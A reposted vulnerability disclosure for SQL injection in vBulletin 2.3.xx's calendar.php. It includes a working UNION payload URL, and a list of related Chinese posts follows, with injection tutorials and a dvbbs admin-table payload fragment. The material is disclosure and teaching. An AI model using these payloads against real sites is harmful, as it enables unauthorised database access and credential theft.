vBulletin Forum 2.3.xx SQL Injection

vBulletin Forum 2.3.xx SQL Injection

There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

(0)

相关推荐

  • vBulletin Forum 2.3.xx SQL Injection

    vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php. -------- Cut from line 585 in calendar.php ----------else if ($action == "edit"){      $eventinfo = $DB_site->query_first("SELECT allowsmilies,publ

  • Advanced SQL Injection with MySQL

    Advanced SQL Injection with MySQL

    文/图 安全天使·angel[BST] 前言 我的<SQL Injection with MySQL>(<黑客防线>7月的专题)已经对MySQL的注入有了比较全面的介绍了,但是有一个危害相当大的函数,我并没有在文中提及,因为如果能灵活应用这个函数,那PHP甚至服务器的安全性均会大打折扣,由于<SQL Injection with MySQL>的发表时间是在暑假期间,考虑到很多新手.学生和品德败坏的人乱用,所以我并没有把这个写在该文里,其实本文在5月初已写完.专题发表后,

  • Discuz! 4.x SQL injection / admin credentials disclosure exploit

    Discuz! 4.x SQL injection / admin credentials disclosure exploit

    前段时间发过Discuz! 5.0.0 GBK版本的EXP 今天在CN.Tink那里看到的4.x的,我去原站转了过来,然后找了个Discuz! 4.1.0测试了一下,成功,看下面截图,Discuz! 5.0.0 GBK版本的那个EXP又许多朋友不知道怎么用,当时我说了下,还是有朋友不明白,这次我截了图上来,不知道怎么用的朋友看下应该明白的. 图: 复制代码 代码如下: <?php print_r(' ------------------------------------------------

  • SQL Injection with MySQL 注入分析

    SQL Injection with MySQL 注入分析

    声明 本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有代码均为本人所写,所有数据均经过测试.绝对真实.如果有什么遗漏或错误,欢迎来安全天使论坛和我交流. 前言 2003年开始,喜欢脚本攻击的人越来越多,而且研究ASP下注入的朋友也逐渐多了起来,我看过最早的关于SQL注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯青了,国内才开始注意这个技术,由此看来,国内的这方面的技术相对于国外还是有一段很大差距,话说回来,大家对SQL注入攻击也相当熟悉了,国内各大站点都有些堪称

  • 用PHP函数解决SQL injection

    SQL injection问题在ASP上可是闹得沸沸扬扬当然还有不少国内外著名的PHP程序"遇难".至于SQL injection的详情,网上的文章太多了,在此就不作介绍.如果你网站空间的php.ini文件里的magic_quotes_gpc设成了off,那么PHP就不会在敏感字符前加上反斜杠(\),由于表单提交的内容可能含有敏感字符,如单引号('),就导致了SQL injection的漏洞.在这种情况下,我们可以用addslashes()来解决问题,它会自动在敏感字符前添加反斜杠.

  • php SQL Injection with MySQL

    php SQL Injection with MySQL

    前言 2003年开始,喜欢脚本攻击的人越来越多,而且研究ASP下注入的朋友也逐渐多了起来,我看过最早的关于SQL注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯青了,国内才开始注意这个技术,由此看来,国内的这方面的技术相对于国外还是有一段很大差距,话说回来,大家对SQL注入攻击也相当熟悉了,国内各大站点都有些堪称经典的作品,不过作为一篇完整的文章,我觉得还是有必要再说说其定义和原理.如果哪位高手已经达到炉火纯青的地步,不妨给本文挑点刺.权当指点小弟. 关于php+Mysql的注入 国

  • 攻击方式学习之SQL注入(SQL Injection)第1/3页

    攻击方式学习之SQL注入(SQL Injection)第1/3页

    这就给不怀好意的同学可乘之机,利用输入一些奇特的查询字符串,拼接成特定的SQL语 句,即可达到注入的目的.不仅可以获取数据库重要信息,权限没有设置好的话甚至可以删除掉整个表.因此,SQL注入漏洞还是相当的严重的.发现以前偶刚学 写的网站的时候也是靠拼接SQL语句吃饭滴-- 示例 为了更好了学习和了解SQL注入的方法,做了一个示例网页,界面如下:  点击登陆这块的代码如下,注意第5行,我们使用了拼接SQL语句: 复制代码 代码如下: private void Login() { string un

  • Sql Injection in DB2数据库

    使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手.不过在网上很难找到相关的资料,只好自己研究了. 参考了IBM DB2的文档,总结了这样几条: 1.select NAME from SYSIBM.SYSTABLES where CREATOR =USER 可以返回系统中所有用户创建的表(table)名 2.select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME='' 返回表中的列名 3.selec

  • dvbbs 8.2 SQL Injection注射漏洞分析

    password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2

  • 用C语言winform编写渗透测试工具实现SQL注入功能

    用C语言winform编写渗透测试工具实现SQL注入功能

    目录 用C语言winform编写渗透测试工具使SQL注入 一.SQL注入 二.实现步骤 三.代码实现 四.软件使用步骤 用C语言winform编写渗透测试工具使SQL注入 一.SQL注入 原理: SQL注入是指攻击者在Web应用程序中事先定义好的查询语句的结尾加上额外的SQL语句,这些一般都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作.(危害:盗取网站敏感信息.绕过验证登录网站后台.借助数据库的存储过程进行权限提升等操作).造成的原因是程序员在编写Web程序时,没有对浏览

随机推荐